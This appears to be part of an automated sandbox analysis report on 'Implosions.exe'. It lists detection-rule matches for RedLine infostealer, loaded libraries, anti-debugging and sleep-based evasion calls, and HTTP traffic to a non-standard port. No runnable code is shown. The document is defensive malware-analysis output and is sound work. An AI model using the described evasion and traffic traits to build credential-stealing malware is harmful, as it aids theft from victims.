            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.winEXE@2/0@0/1
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
            Source: C:\Users\user\Desktop\Implosions.exeCommand line argument: 08A0_2_00413780
            Source: Implosions.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Implosions.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Implosions.exeReversingLabs: Detection: 71%
            Source: Implosions.exeVirustotal: Detection: 53%
            Source: unknownProcess created: C:\Users\user\Desktop\Implosions.exe "C:\Users\user\Desktop\Implosions.exe"
            Source: C:\Users\user\Desktop\Implosions.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Implosions.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000074B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: o.pdbService source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbys source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.0000000000705000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000077D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdbUN source: Implosions.exe, 00000000.00000002.2911841113.0000000005BD2000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: Implosions.exeStatic PE information: real checksum: 0x23bfb should be: 0x2dee8
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040BB97 push dword ptr [ecx-75h]; iretd 0_2_0040BBA3
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC3F7 pushfd ; retf 0_2_021BC44E
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC3F7 pushad ; retf 0_2_021BC46A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC408 pushad ; retf 0_2_021BC412
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC420 push esp; retf 0_2_021BC45A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC450 pushad ; retf 0_2_021BC412
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC450 push esp; retf 0_2_021BC45A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC444 push esp; retf 0_2_021BC406
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC444 pushfd ; retf 0_2_021BC44E
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC47C pushfd ; retf 0_2_021BC4BA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC49C pushad ; retf 0_2_021BC46A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC4AC pushfd ; retf 0_2_021BC4BA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_021BC4F0 pushfd ; retf 0_2_021BC4BA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE73E0 push esp; iretd 0_2_05CE759A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE73D3 push ebx; iretd 0_2_05CE73DA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE73D1 push esp; iretd 0_2_05CE73D2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE83F1 pushad ; iretd 0_2_05CE83F2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6DA3 push eax; iretd 0_2_05CE6DAA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6DA1 push eax; iretd 0_2_05CE6DA2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE4CC0 pushfd ; iretd 0_2_05CE4CC1
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6EF3 push ecx; iretd 0_2_05CE6EFA
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6EF1 push edx; iretd 0_2_05CE6EF2
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE6E36 push eax; iretd 0_2_05CE6E3A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE7903 push ebp; iretd 0_2_05CE790A
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05CE7900 push ebp; iretd 0_2_05CE7902
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05D68DA2 push eax; ret 0_2_05D68DB9
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_05DEB8E9 push 3005D34Ch; iretd 0_2_05DEB8F5

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6677
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 6677
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: 2170000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: 44C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-67171
            Source: C:\Users\user\Desktop\Implosions.exe TID: 7548Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: C:\Users\user\Desktop\Implosions.exeAPI call chain: ExitProcess graph end nodegraph_0-67406
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
            Source: C:\Users\user\Desktop\Implosions.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
